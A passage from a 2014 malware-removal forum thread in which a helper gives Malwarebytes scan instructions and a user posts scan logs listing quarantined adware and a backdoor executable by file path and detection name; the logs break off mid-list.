PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins.json, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\1.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\102.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\123.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\13.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\14.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\16.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\17.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\177.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\180.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\182.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\183.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\192.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\195.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\207.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\21.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\22.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\220.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\221.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\223.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\242.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\244.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\246.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\259.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\260.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\263.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\268.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\273.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\28.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\281.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\284.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\4.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\47.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\64.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\7.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\72.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\78.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\9.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\91.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\93.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins\98.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\userCode\background.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\userCode\extension.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\locale\en-US\translations.dtd, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\button1.png, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\button2.png, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\button3.png, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\button4.png, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\button5.png, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\crossrider_statusbar.png, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\icon128.png, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\icon16.png, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\icon24.png, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\icon48.png, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\panelarrow-up.png, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\popup.html, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\skin.css, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin\update.css, , [79e14d767cff2e08d130755b34ce07f9], 
 
Physical Sectors: 0
(No malicious items detected)
 
 
(end)


#10 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,079 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:The Arctic Circle
  • Local time:05:54 AM

Posted 07 August 2014 - 11:40 AM

Hi jsutbee,

 

Roughly, how many html files do you have?

 

Running a Malwarebytes scan:

  • Double-click on the Malwarebytes icon on your desktop
  • The program will open and click the 'Update Now >>' link
  • After the update completes, click the 'Scan Now >>' button.
  • Or, on the Dashboard, click the Scan Now >> button.
  • If an update is available, click the Update Now button.
  • A Threat Scan will begin.
  • When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.
  • In most cases, a restart will be required.
  • Wait for the prompt to restart the computer to appear, then click on Yes.
  • After the restart once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double click on the scan log which shows the Date and time of the scan just performed.
  • Click 'Copy to Clipboard'
  • Paste the contents of the clipboard into your reply.

xXToffeeXx~


~If I am helping you and you have not had a reply from me in two days, please send me a PM~

 

logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic] - If we have helped you out and you want to support what we do, you can do so here

 

 ~Twitter~ | ~Malware Analyst at Emsisoft~


#11 jsutbee

jsutbee
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:11:39 AM

Posted 11 August 2014 - 12:42 AM

Hi Toffee,
I have been working on the infected pc for more than 2 years and i can't guess how many html files were there before.Lots of html files are already deleted by avg antivirus and now i think there is not to much files left of that type :( .

Approximately there may 2-4 hundreds html files as most of the files extension are .php and .py

Rest here is my scan results

 

Protection Log
 

Malwarebytes Anti-Malware
www.malwarebytes.org
 
 
Protection, 8/11/2014 10:10:06 AM, SYSTEM, BIKASH, Protection, Malware Protection, Starting, 
Protection, 8/11/2014 10:10:06 AM, SYSTEM, BIKASH, Protection, Malware Protection, Started, 
Protection, 8/11/2014 10:10:06 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Starting, 
Protection, 8/11/2014 10:12:04 AM, SYSTEM, BIKASH, Protection, Malware Protection, Starting, 
Protection, 8/11/2014 10:12:04 AM, SYSTEM, BIKASH, Protection, Malware Protection, Started, 
Protection, 8/11/2014 10:12:04 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Starting, 
Protection, 8/11/2014 10:14:47 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Started, 
Update, 8/11/2014 10:28:26 AM, SYSTEM, BIKASH, Manual, Malware Database, 2014.8.8.1, 2014.8.11.1, 
Protection, 8/11/2014 10:28:30 AM, SYSTEM, BIKASH, Protection, Refresh, Starting, 
Protection, 8/11/2014 10:28:30 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Stopping, 
Protection, 8/11/2014 10:28:31 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Stopped, 
Protection, 8/11/2014 10:28:59 AM, SYSTEM, BIKASH, Protection, Refresh, Success, 
Protection, 8/11/2014 10:28:59 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Starting, 
Protection, 8/11/2014 10:29:00 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Started, 
Protection, 8/11/2014 10:39:42 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Stopping, 
Protection, 8/11/2014 10:39:43 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Stopped, 
Protection, 8/11/2014 10:39:43 AM, SYSTEM, BIKASH, Protection, Malware Protection, Stopping, 
Protection, 8/11/2014 10:40:03 AM, SYSTEM, BIKASH, Protection, Malware Protection, Stopped, 
Protection, 8/11/2014 10:40:37 AM, SYSTEM, BIKASH, Protection, Malware Protection, Starting, 
Protection, 8/11/2014 10:40:37 AM, SYSTEM, BIKASH, Protection, Malware Protection, Started, 
Protection, 8/11/2014 10:40:37 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Starting, 
Protection, 8/11/2014 10:40:37 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Started, 
Update, 8/11/2014 10:40:42 AM, SYSTEM, BIKASH, Manual, Rootkit Database, 2014.2.20.1, 2014.8.4.1, 
Update, 8/11/2014 10:43:10 AM, SYSTEM, BIKASH, Manual, Malware Database, 2014.3.4.9, 2014.8.11.1, 
Protection, 8/11/2014 10:43:13 AM, SYSTEM, BIKASH, Protection, Refresh, Starting, 
Protection, 8/11/2014 10:43:13 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Stopping, 
Protection, 8/11/2014 10:43:13 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Stopped, 
Protection, 8/11/2014 10:43:20 AM, SYSTEM, BIKASH, Protection, Refresh, Success, 
Protection, 8/11/2014 10:43:20 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Starting, 
Protection, 8/11/2014 10:43:21 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Started, 
Protection, 8/11/2014 11:09:33 AM, SYSTEM, BIKASH, Protection, Malware Protection, Starting, 
Protection, 8/11/2014 11:09:33 AM, SYSTEM, BIKASH, Protection, Malware Protection, Started, 
Protection, 8/11/2014 11:09:33 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Starting, 
Protection, 8/11/2014 11:11:52 AM, SYSTEM, BIKASH, Protection, Malicious Website Protection, Started, 
 
(end)
 
 
Scan Log

Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 8/11/2014
Scan Time: 10:56:23 AM
Logfile: 
Administrator: Yes
 
Version: 2.00.2.1012
Malware Database: v2014.08.11.01
Rootkit Database: v2014.08.04.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled
 
OS: Windows 7
CPU: x86
File System: NTFS
User: User
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 423046
Time Elapsed: 9 min, 34 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 11
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\CLASSES\CLSID\{9BB812EA-6A11-4F94-AE32-DB3FD45EC496}, Quarantined, [98b510b53546072f1261dac9b64c8d73], 
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\CLASSES\TYPELIB\{66B51873-B53D-42EC-BC1A-862EB4DB041D}, Quarantined, [98b510b53546072f1261dac9b64c8d73], 
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{D01C1E11-ED7A-4791-8408-E63EECDA48FF}, Quarantined, [98b510b53546072f1261dac9b64c8d73], 
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{5C6B193D-C4D0-4A0C-8509-8EA566380A7C}, Quarantined, [4ffe21a473081d19beb74c571ce69c64], 
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\CLASSES\TypeLib\{BDB0F124-48E8-43A5-A263-45A7093CF058}, Quarantined, [3a1361648eed3ff793e2178ce2205fa1], 
PUP.Optional.RichMediaView.A, HKLM\SOFTWARE\RichMediaViewV1release335, Quarantined, [7dd03b8a4d2eff3779bacb20c43e34cc], 
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\kbanbanalocifhgjcppngcdgminjckhm, Quarantined, [e06d903599e25cda26f720c05fa359a7], 
PUP.Optional.uTorrentTB.A, HKLM\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\pacgpkgadgmibnhpdidcnfafllnmeomc, Quarantined, [84c96e5736458ea832813db659a9a35d], 
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\ZIP ENHANCER, Quarantined, [47066d5881fabf77d64524bc25dd35cb], 
PUP.Optional.PlusHD.A, HKU\S-1-5-18-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SOFTWARE\HD-V1.9, Quarantined, [a3aa4f760e6d69cd3283905501019868], 
PUP.Optional.SavePass.A, HKU\S-1-5-18-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SOFTWARE\SavePass, Quarantined, [0e3fa322067538fe57f8e10d19e9b14f], 
 
Registry Values: 10
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@zipenhancer.com, C:\Program Files\AmiExt\ZipEnhancer\ff, Quarantined, [66e7873ea0db142228f431afaa5812ee]
PUP.Optional.WebExpEnhanced.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@WebexpEnhancedV1alpha26.net, C:\Program Files\WebexpEnhancedV1\WebexpEnhancedV1alpha26\ff, Quarantined, [4706992c87f462d4e8feba47f80bcd33]
PUP.Optional.VideoPlayer.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@VideoPlayerV3beta10835.net, C:\Program Files\VideoPlayerV3\VideoPlayerV3beta10835\ff, Quarantined, [f954e2e34c2f181e54171ddbcc361ee2]
PUP.Optional.MediaPlayerAlpha.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@MediaPlayerV1alpha583.net, C:\Program Files\MediaPlayerV1\MediaPlayerV1alpha583\ff, Quarantined, [9bb2299c4a312610d66a8a78f112768a]
PUP.Optional.MediaViewer.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@MediaViewerV1alpha442.net, C:\Program Files\MediaViewerV1\MediaViewerV1alpha442\ff, Quarantined, [bd908045ef8c57dfe2c65ca155adf907]
PUP.Optional.MediaView.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@MediaViewV1alpha678.net, C:\Program Files\MediaViewV1\MediaViewV1alpha678\ff, Quarantined, [72dbd9ec512a7fb728d31be12ad827d9]
PUP.Optional.MediaWatch.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@MediaWatchV1home1288.net, C:\Program Files\MediaWatchV1\MediaWatchV1home1288\ff, Quarantined, [76d7269fd7a4b3837eb7e1548084bf41]
PUP.Optional.MediaBuzz.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@MediaBuzzV1mode6898.net, C:\Program Files\MediaBuzzV1\MediaBuzzV1mode6898\ff, Quarantined, [fe4f9c2981fa79bda86f33be8b77cc34]
PUP.Optional.RichMediaView.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@RichMediaViewV1release335.net, C:\Program Files\RichMediaViewV1\RichMediaViewV1release335\ff, Quarantined, [d37accf9562589ad023028c38181ff01]
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\ZIP ENHANCER|Path, C:\Program Files\AmiExt\ZipEnhancer, Quarantined, [47066d5881fabf77d64524bc25dd35cb]
 
Registry Data: 0
(No malicious items detected)
 
Folders: 14
PUP.Optional.OffersWizard.A, C:\Program Files\Common Files\Config, Quarantined, [9eaff6cf2457ee482b9919c4857d22de], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\defaults, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\defaults\preferences, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\userCode, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\locale, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\locale\en-US, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
 
Files: 114
PUP.Optional.Bandoo, C:\Users\User\Downloads\iLividSetup-r362-n-bc.exe, Quarantined, [e568982d0279e74f0e4a4cc8738e4eb2], 
PUP.Optional.Amonetize, C:\Users\User\AppData\Local\1682\a19451.exe, Quarantined, [004d20a5abd0ac8aa8ef455c5aa7837d], 
Backdoor.IRCBot, C:\Users\User\AppData\Local\1682\a19451mgr.exe, Quarantined, [3b1208bdabd04aec81a89985e71a41bf], 
PUP.Optional.OffersWizard.A, C:\Program Files\Common Files\Config\ver.xml, Quarantined, [9eaff6cf2457ee482b9919c4857d22de], 
PUP.Optional.MindSpark.A, C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_radiorage.dl.tb.ask.com_0.localstorage, Quarantined, [0449e5e0ea915fd7b2ca30bf13ef03fd], 
PUP.Optional.MindSpark.A, C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_radiorage.dl.tb.ask.com_0.localstorage-journal, Quarantined, [64e9f4d1780380b6b2ca07e85da519e7], 
